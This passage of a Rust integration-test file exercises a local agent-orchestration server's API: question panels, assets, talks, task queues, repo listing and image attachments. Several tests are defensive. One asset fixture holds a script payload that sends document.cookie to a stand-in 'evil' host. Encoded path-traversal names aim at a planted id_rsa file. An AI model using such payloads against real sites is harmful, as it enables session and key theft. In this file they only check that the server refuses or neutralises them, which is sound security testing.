4550 assert_eq!(as_png.header("content-type"), Some("image/png"));
4551 assert_eq!(
4552 as_png.header("content-disposition"),
4553 None,
4554 "a raster image has no execution surface, so tapping it still shows it"
4555 );
4556 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
4557 }
4558
4559 #[tokio::test]
4560 async fn an_html_asset_is_never_served_as_html() {
4561 let fx = Fixture::start().await;
4562 let id = panel(
4563 &fx,
4564 "<p>see the notes</p>",
4565 &[
4566 (
4567 "notes.html",
4568 b"<script>fetch('http://evil/'+document.cookie)</script>",
4569 ),
4570 ("hook.js", b"fetch('http://evil/')"),
4571 ("data.json", b"{}"),
4572 ("HEADLINE.TXT", b"plain"),
4573 ],
4574 );
4575
4576 for name in ["notes.html", "hook.js", "data.json"] {
4577 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
4578 assert_eq!(res.status, 200, "{name}: {}", res.body);
4579 assert_eq!(
4584 res.header("content-type"),
4585 Some("application/octet-stream"),
4586 "{name} must not be a type the browser will execute or render"
4587 );
4588 }
4589 let txt = fx
4592 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
4593 .await;
4594 assert_eq!(
4595 txt.header("content-type"),
4596 Some("text/plain; charset=utf-8")
4597 );
4598 }
4599
4600 #[tokio::test]
4601 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
4602 let fx = Fixture::start().await;
4603 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
4604 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
4608
4609 for encoded in [
4616 "%2e%2e%2fid_rsa",
4617 "..%2fid_rsa",
4618 "..%5cid_rsa",
4619 "%2e%2e%5cid_rsa",
4620 "diff%00.svg",
4621 "..",
4622 ".hidden",
4623 "%2e%2e%2f%2e%2e%2fid_rsa",
4624 ] {
4625 let res = fx
4626 .get(&format!("/api/questions/{id}/asset/{encoded}"))
4627 .await;
4628 assert_eq!(
4629 res.status, 400,
4630 "`{encoded}` has to be refused by name, not looked up: {}",
4631 res.body
4632 );
4633 assert!(res.json()["error"].is_string(), "{}", res.body);
4634 }
4635
4636 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
4642 let res = fx
4643 .get(&format!("/api/questions/{id}/asset/{literal}"))
4644 .await;
4645 assert_eq!(
4646 res.status, 404,
4647 "`{literal}` must not match the asset route at all: {}",
4648 res.body
4649 );
4650 }
4651 }
4652
4653 #[tokio::test]
4654 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
4655 let fx = Fixture::start().await;
4656 let plain = ask(&fx, "Which backend?", &["SQLite"]);
4657 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
4658
4659 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
4663 assert_eq!(none.status, 404, "{}", none.body);
4664 assert!(none.json()["error"].is_string(), "{}", none.body);
4665 assert_eq!(
4666 fx.head(&format!("/api/questions/{plain}/panel"))
4667 .await
4668 .status,
4669 404,
4670 "the preflight is the only way the client can learn this"
4671 );
4672
4673 let missing = fx
4675 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
4676 .await;
4677 assert_eq!(missing.status, 404, "{}", missing.body);
4678 assert!(missing.json()["error"].is_string(), "{}", missing.body);
4679
4680 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
4682 assert_eq!(
4683 fx.get("/api/questions/nope/asset/diff.svg").await.status,
4684 404
4685 );
4686 }
4687
4688 #[tokio::test]
4689 async fn a_run_with_an_open_question_reads_as_waiting() {
4690 let fx = Fixture::start().await;
4691 let run = "20260902-000000-beef".to_owned();
4692 write_run(&fx.runs(), &run, RunStatus::Implementing);
4693
4694 let before = fx.get("/api/runs").await.json();
4695 assert_eq!(before[0]["waiting"], false, "{before}");
4696
4697 let store = fx.questions();
4698 let mut q = Question::new(
4699 run.clone(),
4700 "implement".to_owned(),
4701 "impl-A".to_owned(),
4702 "Which backend?".to_owned(),
4703 String::new(),
4704 vec!["SQLite".to_owned()],
4705 );
4706 store.put(&mut q).expect("put");
4707
4708 let during = fx.get("/api/runs").await.json();
4709 assert_eq!(during[0]["waiting"], true, "{during}");
4710
4711 q.answer(Answer::Choice("SQLite".to_owned()))
4714 .expect("answer");
4715 store.put(&mut q).expect("put");
4716 let after = fx.get("/api/runs").await.json();
4717 assert_eq!(after[0]["waiting"], false, "{after}");
4718 }
4719
4720 #[tokio::test]
4721 async fn an_open_question_is_listed_and_counted_by_health() {
4722 let fx = Fixture::start().await;
4723 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
4724
4725 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4726 let listed = fx.get("/api/questions").await.json();
4727 assert_eq!(listed.as_array().expect("array").len(), 1);
4728 assert_eq!(listed[0]["id"], id);
4729 assert_eq!(listed[0]["status"], "open");
4730 assert_eq!(listed[0]["choices"][1], "Redis");
4731 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
4734 }
4735
4736 #[tokio::test]
4737 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
4738 let fx = Fixture::start().await;
4739 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4740 let path = format!("/api/questions/{id}/answer");
4741
4742 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
4743 assert_eq!(res.status, 200, "{}", res.body);
4744 let body = res.json();
4745 assert_eq!(body["status"], "answered");
4746 assert_eq!(body["answer"]["choice"], "Redis");
4747
4748 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
4752 assert_eq!(again.status, 409, "{}", again.body);
4753 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
4754 }
4755
4756 #[tokio::test]
4757 async fn saying_something_appends_a_turn_without_answering() {
4758 let fx = Fixture::start().await;
4759 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4760 let path = format!("/api/questions/{id}/say");
4761
4762 let res = fx
4763 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
4764 .await;
4765 assert_eq!(res.status, 200, "{}", res.body);
4766 let body = res.json();
4767 assert_eq!(body["status"], "open", "talking back is not a decision");
4768 assert_eq!(body["answer"], Value::Null);
4769 assert_eq!(body["thread"][0]["who"], "operator");
4770 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
4771 assert_eq!(body["waiting_on_agent"], true);
4772 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
4774 }
4775
4776 #[tokio::test]
4777 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
4778 let fx = Fixture::start().await;
4779 let store = fx.questions();
4780 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4781 assert_eq!(
4782 fx.get("/api/health").await.json()["questions_needs_owner"],
4783 1
4784 );
4785
4786 let res = fx
4792 .post(
4793 &format!("/api/questions/{id}/say"),
4794 Some(r#"{"body":"why not Postgres?"}"#),
4795 )
4796 .await;
4797 assert_eq!(res.status, 200, "{}", res.body);
4798 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
4799 assert_eq!(
4800 fx.get("/api/health").await.json()["questions_needs_owner"],
4801 0,
4802 "waiting on the agent is not waiting on the owner"
4803 );
4804
4805 let mut q = store.get(&id).expect("get");
4809 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
4810 .expect("reply");
4811 store.put(&mut q).expect("put");
4812 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
4813 assert_eq!(
4814 fx.get("/api/health").await.json()["questions_needs_owner"],
4815 1,
4816 "the agent's reply is what should light the banner back up"
4817 );
4818 }
4819
4820 #[tokio::test]
4821 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
4822 let fx = Fixture::start().await;
4823 let store = fx.questions();
4824
4825 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4826 let res = fx
4827 .post(
4828 &format!("/api/questions/{empty_id}/say"),
4829 Some(r#"{"body":" "}"#),
4830 )
4831 .await;
4832 assert_eq!(res.status, 400, "{}", res.body);
4833
4834 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4835 let mut answered = store.get(&answered_id).expect("get");
4836 answered
4837 .answer(Answer::Choice("SQLite".to_owned()))
4838 .expect("answer");
4839 store.put(&mut answered).expect("put");
4840 let res = fx
4841 .post(
4842 &format!("/api/questions/{answered_id}/say"),
4843 Some(r#"{"body":"still there?"}"#),
4844 )
4845 .await;
4846 assert_eq!(res.status, 409, "{}", res.body);
4847
4848 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4849 let mut abandoned = store.get(&abandoned_id).expect("get");
4850 abandoned.abandon("timed out");
4851 store.put(&mut abandoned).expect("put");
4852 let res = fx
4853 .post(
4854 &format!("/api/questions/{abandoned_id}/say"),
4855 Some(r#"{"body":"still there?"}"#),
4856 )
4857 .await;
4858 assert_eq!(res.status, 409, "{}", res.body);
4859 }
4860
4861 #[tokio::test]
4862 async fn an_answer_the_question_does_not_offer_is_refused() {
4863 let fx = Fixture::start().await;
4864 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
4865 let path = format!("/api/questions/{id}/answer");
4866
4867 for body in [
4868 r#"{"choice":"Postgres"}"#,
4869 r#"{"text":"whatever you think"}"#,
4870 r#"{"choice":"Redis","text":"both"}"#,
4871 r#"{}"#,
4872 ] {
4873 let res = fx.post(&path, Some(body)).await;
4874 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
4875 assert!(res.json()["error"].is_string(), "{}", res.body);
4876 }
4877 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
4879 }
4880
4881 #[tokio::test]
4882 async fn a_free_text_question_takes_text_and_not_a_choice() {
4883 let fx = Fixture::start().await;
4884 let id = ask(&fx, "What should the flag be called?", &[]);
4885 let path = format!("/api/questions/{id}/answer");
4886
4887 assert_eq!(
4888 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
4889 400
4890 );
4891 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
4892 assert_eq!(res.status, 200, "{}", res.body);
4893 assert_eq!(res.json()["answer"]["text"], "--json");
4894 }
4895
4896 #[tokio::test]
4897 async fn an_unknown_question_is_a_json_404() {
4898 let fx = Fixture::start().await;
4899 let res = fx
4900 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
4901 .await;
4902 assert_eq!(res.status, 404, "{}", res.body);
4903 assert!(res.json()["error"].is_string());
4904 }
4905
4906 #[tokio::test]
4913 async fn a_task_cannot_be_filed_over_the_phone_directly() {
4914 let f = Fixture::start().await;
4915
4916 let res = f
4917 .post(
4918 "/api/queue",
4919 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
4920 )
4921 .await;
4922
4923 assert_eq!(
4924 res.status, 405,
4925 "POST /api/queue must not be a route: {}",
4926 res.body
4927 );
4928 assert!(
4929 f.queue().list().is_empty(),
4930 "a task filed by a route that does not exist must not reach the disk"
4931 );
4932 assert_eq!(f.get("/api/queue").await.status, 200);
4935 }
4936
4937 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
4939 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
4940 .expect("checkout dir");
4941 }
4942
4943 #[tokio::test]
4944 async fn repos_list_returns_name_and_path_for_every_configured_root() {
4945 let tmp = TempDir::new().expect("tempdir");
4946 let repo = tmp.path().join("repo");
4947 std::fs::create_dir_all(&repo).expect("repo dir");
4948 let root = tmp.path().join("root");
4949 make_checkout(&root, "github.com", "yukimemi", "magi");
4950 std::fs::write(
4951 repo.join("magi.toml"),
4952 format!(
4953 "[repos]\nroots = [{:?}]\n",
4954 root.to_string_lossy().into_owned()
4955 ),
4956 )
4957 .expect("write magi.toml");
4958
4959 let f = Fixture::with_repo(repo).await;
4960 let res = f.get("/api/repos").await;
4961 assert_eq!(res.status, 200, "{}", res.body);
4962 let list = res.json();
4963 let repos = list.as_array().expect("an array");
4964 assert_eq!(repos.len(), 1);
4965 assert_eq!(repos[0]["name"], "yukimemi/magi");
4966 assert!(
4967 repos[0]["path"]
4968 .as_str()
4969 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
4970 "{list}"
4971 );
4972 }
4973
4974 #[tokio::test]
4975 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
4976 let tmp = TempDir::new().expect("tempdir");
4977 let repo = tmp.path().join("repo");
4978 std::fs::create_dir_all(&repo).expect("repo dir");
4979 let root = tmp.path().join("root");
4980 make_checkout(&root, "github.com", "yukimemi", "magi");
4981 std::fs::write(
4982 repo.join("magi.toml"),
4983 format!(
4984 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
4985 root.to_string_lossy().into_owned()
4986 ),
4987 )
4988 .expect("write magi.toml");
4989
4990 let f = Fixture::with_repo(repo).await;
4991 let first = f.get("/api/repos").await;
4992 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
4993
4994 make_checkout(&root, "github.com", "yukimemi", "rvpm");
4997 let second = f.get("/api/repos").await;
4998 assert_eq!(
4999 second.json().as_array().map(Vec::len),
5000 Some(1),
5001 "a fresh cache must not rescan inside the TTL"
5002 );
5003
5004 let refreshed = f.get("/api/repos?refresh=1").await;
5005 assert_eq!(
5006 refreshed.json().as_array().map(Vec::len),
5007 Some(2),
5008 "an explicit refresh must rescan even inside the TTL"
5009 );
5010 }
5011
5012 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5018
5019 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5023 let tmp = TempDir::new().expect("tempdir");
5024 let repo = tmp.path().join("repo");
5025 std::fs::create_dir_all(&repo).expect("repo dir");
5026 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5027 let f = Fixture::with_repo(repo.clone()).await;
5028 (tmp, repo, f)
5029 }
5030
5031 #[tokio::test]
5032 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5033 let (_tmp, _repo, f) = talk_fixture().await;
5034
5035 let opened = f.post("/api/talks", None).await;
5038 assert_eq!(opened.status, 201, "{}", opened.body);
5039 let body = opened.json();
5040 assert_eq!(body["status"], "open");
5041 assert_eq!(
5042 body["turns"].as_array().unwrap().len(),
5043 0,
5044 "opening takes no agent turn: there is nothing yet to answer"
5045 );
5046
5047 let also_opened = f.post("/api/talks", Some("{}")).await;
5049 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5050
5051 let listed = f.get("/api/talks").await.json();
5052 assert_eq!(listed.as_array().unwrap().len(), 2);
5053 }
5054
5055 #[tokio::test]
5056 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5057 let f = Fixture::start().await;
5058 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5059 let queue = f.queue();
5060 let mut mine = Task::new(
5061 "rename the loader".to_owned(),
5062 "rename the loader".to_owned(),
5063 PathBuf::from("/repo/magi"),
5064 Source::Agent {
5065 run: talk_id.clone(),
5066 node: "chat".to_owned(),
5067 },
5068 );
5069 queue.put(&mut mine).expect("file the task");
5070 let mut theirs = Task::new(
5071 "unrelated".to_owned(),
5072 "unrelated".to_owned(),
5073 PathBuf::from("/repo/magi"),
5074 Source::Human,
5075 );
5076 queue.put(&mut theirs).expect("file the task");
5077
5078 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5079 assert_eq!(res.status, 200, "{}", res.body);
5080 let body = res.json();
5081 assert_eq!(
5082 body["status"], "open",
5083 "filing a task does not close a talk"
5084 );
5085 let tasks = body["tasks"].as_array().expect("tasks array");
5086 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5087 assert_eq!(tasks[0]["id"], mine.id);
5088 }
5089
5090 #[tokio::test]
5091 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5092 let (_tmp, _repo, f) = talk_fixture().await;
5093 let id = f.post("/api/talks", None).await.json()["id"]
5094 .as_str()
5095 .expect("id")
5096 .to_owned();
5097
5098 let res = f
5099 .post(
5100 &format!("/api/talks/{id}/say"),
5101 Some(r#"{"text":"what does the queue module do?"}"#),
5102 )
5103 .await;
5104 assert_eq!(res.status, 202, "{}", res.body);
5105 let queued = res.json();
5106 let turns = queued["turns"].as_array().expect("turns array");
5107 assert_eq!(
5108 turns.len(),
5109 1,
5110 "the answer reflects only what is on disk the instant it is sent, \
5111 before the agent's turn - which can run for the whole of \
5112 `[graph] timeout_talk` - has a chance to land: {queued}"
5113 );
5114 assert_eq!(turns[0]["who"], "operator");
5115 assert_eq!(turns[0]["body"], "what does the queue module do?");
5116 assert_eq!(
5117 queued["thinking"], true,
5118 "the accepted response exposes the background turn claim: {queued}"
5119 );
5120
5121 let mut turns_after = 1;
5122 for _ in 0..200 {
5123 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5124 turns_after = detail["turns"].as_array().expect("turns array").len();
5125 if turns_after == 2 {
5126 break;
5127 }
5128 tokio::time::sleep(Duration::from_millis(10)).await;
5129 }
5130 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5131 }
5132
5133 #[tokio::test]
5134 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
5135 let (_tmp, _repo, f) = talk_fixture().await;
5136 let id = f.post("/api/talks", None).await.json()["id"]
5137 .as_str()
5138 .expect("id")
5139 .to_owned();
5140 let store = f.talks();
5141 let mut recovered = store.get(&id).expect("opened talk");
5142 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5143 .expect("persist pending draft without a live turn");
5144
5145 let edited = f
5146 .post(
5147 &format!("/api/talks/{id}/pending/edit"),
5148 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
5149 )
5150 .await;
5151 assert_eq!(edited.status, 200, "{}", edited.body);
5152 assert!(edited.json()["thinking"].as_bool().unwrap());
5153
5154 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
5155 for _ in 0..200 {
5156 if detail["turns"].as_array().expect("turns").len() == 2 {
5157 break;
5158 }
5159 tokio::time::sleep(Duration::from_millis(10)).await;
5160 detail = f.get(&format!("/api/talks/{id}")).await.json();
5161 }
5162 let turns = detail["turns"].as_array().expect("turns");
5163 assert_eq!(
5164 turns.len(),
5165 2,
5166 "the recovered draft must run once: {detail}"
5167 );
5168 assert_eq!(turns[0]["body"], "corrected");
5169 assert_eq!(detail["pending"], "");
5170 }
5171
5172 #[tokio::test]
5173 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
5174 let tmp = TempDir::new().expect("tempdir");
5175 let repo = tmp.path().join("repo");
5176 std::fs::create_dir_all(&repo).expect("repo dir");
5177 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5178 let f = Fixture::with_repo(repo).await;
5179 let id = f.post("/api/talks", None).await.json()["id"]
5180 .as_str()
5181 .expect("id")
5182 .to_owned();
5183 let store = f.talks();
5184 let mut recovered = store.get(&id).expect("opened talk");
5185 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5186 .expect("persist pending draft without a live turn");
5187
5188 let refused = f
5189 .post(
5190 &format!("/api/talks/{id}/say"),
5191 Some(r#"{"text":"new message"}"#),
5192 )
5193 .await;
5194 assert_eq!(refused.status, 409, "{}", refused.body);
5195 assert!(refused.body.contains("resume"), "{}", refused.body);
5196 let saved = store.get(&id).expect("draft remains after refusal");
5197 assert!(saved.turns.is_empty());
5198 assert_eq!(saved.pending, "saved before restart");
5199
5200 let say_path = format!("/api/talks/{id}/say");
5201 let (first, second) = tokio::join!(
5202 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
5203 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
5204 );
5205 assert_eq!(first.status, 409, "{}", first.body);
5206 assert_eq!(second.status, 409, "{}", second.body);
5207 let saved = store
5208 .get(&id)
5209 .expect("draft remains after concurrent refusals");
5210 assert!(saved.turns.is_empty());
5211 assert_eq!(saved.pending, "saved before restart");
5212
5213 let resumed = f
5214 .post(&format!("/api/talks/{id}/pending/resume"), None)
5215 .await;
5216 assert_eq!(resumed.status, 202, "{}", resumed.body);
5217 let duplicate = f
5218 .post(&format!("/api/talks/{id}/pending/resume"), None)
5219 .await;
5220 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
5221
5222 for _ in 0..200 {
5223 if store.get(&id).expect("talk").turns.len() == 2 {
5224 break;
5225 }
5226 tokio::time::sleep(Duration::from_millis(10)).await;
5227 }
5228 let finished = store.get(&id).expect("finished talk");
5229 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5230 assert_eq!(finished.turns[0].body, "saved before restart");
5231 assert!(finished.pending.is_empty());
5232 }
5233
5234 #[tokio::test]
5235 async fn an_image_only_recovered_draft_resumes_without_text() {
5236 let (_tmp, _repo, f) = talk_fixture().await;
5237 let id = f.post("/api/talks", None).await.json()["id"]
5238 .as_str()
5239 .expect("id")
5240 .to_owned();
5241 let uploaded = f
5242 .post_bytes(
5243 &format!("/api/talks/{id}/attachments"),
5244 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
5245 PNG_BYTES,
5246 )
5247 .await;
5248 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
5249 let attachment = f
5250 .talks()
5251 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
5252 .expect("attachment metadata")
5253 .expect("stored attachment");
5254 let store = f.talks();
5255 let mut recovered = store.get(&id).expect("opened talk");
5256 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
5257
5258 let resumed = f
5259 .post(&format!("/api/talks/{id}/pending/resume"), None)
5260 .await;
5261 assert_eq!(resumed.status, 202, "{}", resumed.body);
5262 for _ in 0..200 {
5263 if store.get(&id).expect("talk").turns.len() == 2 {
5264 break;
5265 }
5266 tokio::time::sleep(Duration::from_millis(10)).await;
5267 }
5268 let finished = store.get(&id).expect("finished talk");
5269 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5270 assert!(finished.turns[0].body.is_empty());
5271 assert_eq!(finished.turns[0].attachments.len(), 1);
5272 assert!(finished.pending_attachments.is_empty());
5273 }
5274
5275 #[tokio::test]
5276 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
5277 let (_tmp, _repo, f) = talk_fixture().await;
5278 let id = f.post("/api/talks", None).await.json()["id"]
5279 .as_str()
5280 .expect("id")
5281 .to_owned();
5282 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
5283 assert_eq!(closed.status, 200, "{}", closed.body);
5284 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
5285 .expect("serialize closed talk");
5286 for (path, body) in [
5287 (format!("/api/talks/{id}/pending/resume"), None),
5288 (
5289 format!("/api/talks/{id}/pending/clear"),
5290 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
5291 ),
5292 (
5293 format!("/api/talks/{id}/pending/edit"),
5294 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
5295 ),
5296 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
5297 ] {
5298 let response = f.post(&path, body).await;
5299 assert_eq!(response.status, 409, "{}", response.body);
5300 }
5301 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
5302 .expect("serialize closed talk");
5303 assert_eq!(
5304 after_clear, before_clear,
5305 "clear must not rewrite a closed talk"
5306 );
5307 }
5308
5309 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
5312
5313 #[tokio::test]
5314 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
5315 let tmp = TempDir::new().expect("tempdir");
5316 let repo = tmp.path().join("repo");
5317 std::fs::create_dir_all(&repo).expect("repo dir");
5318 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5319 let f = Fixture::with_repo(repo).await;
5320 let id_a = f.post("/api/talks", None).await.json()["id"]
5321 .as_str()
5322 .unwrap()
5323 .to_owned();
5324 let id_b = f.post("/api/talks", None).await.json()["id"]
5325 .as_str()
5326 .unwrap()
5327 .to_owned();
5328
5329 let a = f
5330 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
5331 .await;
5332 assert_eq!(a.status, 202, "{}", a.body);
5333 assert_eq!(a.json()["thinking"], true);
5334 let b = f
5335 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
5336 .await;
5337 assert_eq!(b.status, 202, "{}", b.body);
5338 assert_eq!(b.json()["thinking"], true);
5339
5340 let listed = f.get("/api/talks").await.json();
5341 for id in [&id_a, &id_b] {
5342 let view = listed
5343 .as_array()
5344 .unwrap()
5345 .iter()
5346 .find(|talk| talk["id"] == *id)
5347 .unwrap();
5348 assert_eq!(view["thinking"], true, "{listed}");
5349 }
5350 let repeated = f
5351 .post(
5352 &format!("/api/talks/{id_a}/say"),
5353 Some(r#"{"text":"again"}"#),
5354 )
5355 .await;
5356 assert_eq!(repeated.status, 202, "{}", repeated.body);
5357 assert_eq!(repeated.json()["pending"], "again");
5358 }
5359
5360 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
5363
5364 #[tokio::test]
5365 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
5366 let f = Fixture::start().await;
5367 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
5368
5369 let res = f
5370 .post_bytes(
5371 &format!("/api/talks/{id}/attachments"),
5372 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
5373 PNG_BYTES,
5374 )
5375 .await;
5376 assert_eq!(res.status, 201, "{}", res.body);
5377 let body = res.json();
5378 assert_eq!(body["name"], "shot.png");
5379 assert_eq!(body["mime"], "image/png");
5380 assert_eq!(body["bytes"], PNG_BYTES.len());
5381 let att_id = body["id"].as_str().expect("id").to_owned();
5382 assert_eq!(
5383 att_id.len(),
5384 32,
5385 "the id must never be a client-suppliable path: {att_id}"
5386 );
5387
5388 let got = f
5389 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
5390 .await;
5391 assert_eq!(got.status, 200, "{}", got.body);
5392 assert_eq!(got.header("content-type"), Some("image/png"));
5393 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
5394 assert_eq!(got.bytes, PNG_BYTES);
5395 }
5396
5397 #[tokio::test]
5398 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
5399 let f = Fixture::start().await;
5400 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
5401
5402 let svg = f
5405 .post_bytes(
5406 &format!("/api/talks/{id}/attachments"),
5407 &[("Content-Type", "image/svg+xml")],
5408 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
5409 )
5410 .await;
5411 assert!(
5412 (400..500).contains(&svg.status),
5413 "svg must be refused: {} {}",
5414 svg.status,
5415 svg.body
5416 );
5417 assert!(svg.body.contains("SVG"), "{}", svg.body);
5418
5419 let text = f
5420 .post_bytes(
5421 &format!("/api/talks/{id}/attachments"),
5422 &[("Content-Type", "text/plain")],
5423 b"just some text",
5424 )
5425 .await;
5426 assert!(
5427 (400..500).contains(&text.status),
5428 "an unlisted type must be refused: {} {}",
5429 text.status,
5430 text.body
5431 );
5432
5433 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
5436 let big = f
5437 .post_bytes(
5438 &format!("/api/talks/{id}/attachments"),
5439 &[("Content-Type", "image/png")],
5440 &oversized,
5441 )
5442 .await;
5443 assert_eq!(
5444 big.status,
5445 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
5446 "{}",
5447 big.body
5448 );
5449 }
5450
5451 #[tokio::test]
5452 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
5453 let f = Fixture::start().await;
5454 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
5455
5456 let res = f
5459 .post_bytes(
5460 &format!("/api/talks/{id}/attachments"),
5461 &[("Content-Type", "image/png")],
5462 b"<html>not a picture</html>",
5463 )
5464 .await;
5465 assert!((400..500).contains(&res.status), "{}", res.body);
5466 }
5467
5468 #[tokio::test]
5469 async fn an_unknown_attachment_id_is_a_404() {
5470 let f = Fixture::start().await;
5471 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
5472
5473 let res = f
5474 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
5475 .await;
5476 assert_eq!(res.status, 404, "{}", res.body);
5477 }
5478
5479 #[tokio::test]
5480 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
5481 let f = Fixture::start().await;
5482 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
5483
5484 let uploaded = f
5485 .post_bytes(
5486 &format!("/api/talks/{id}/attachments"),
5487 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
5488 PNG_BYTES,
5489 )
5490 .await;
5491 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
5492 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
5493
5494 let res = f
5495 .post(
5496 &format!("/api/talks/{id}/say"),
5497 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
5498 )
5499 .await;
5500 assert_eq!(res.status, 202, "{}", res.body);
5501 let queued = res.json();
5502 let turns = queued["turns"].as_array().expect("turns array");
5503 assert_eq!(
5504 turns.len(),
5505 1,
5506 "an empty body with an attachment is still a turn: {queued}"
5507 );
5508 assert_eq!(turns[0]["who"], "operator");
5509 assert_eq!(turns[0]["body"], "");
5510 let atts = turns[0]["attachments"]
5511 .as_array()
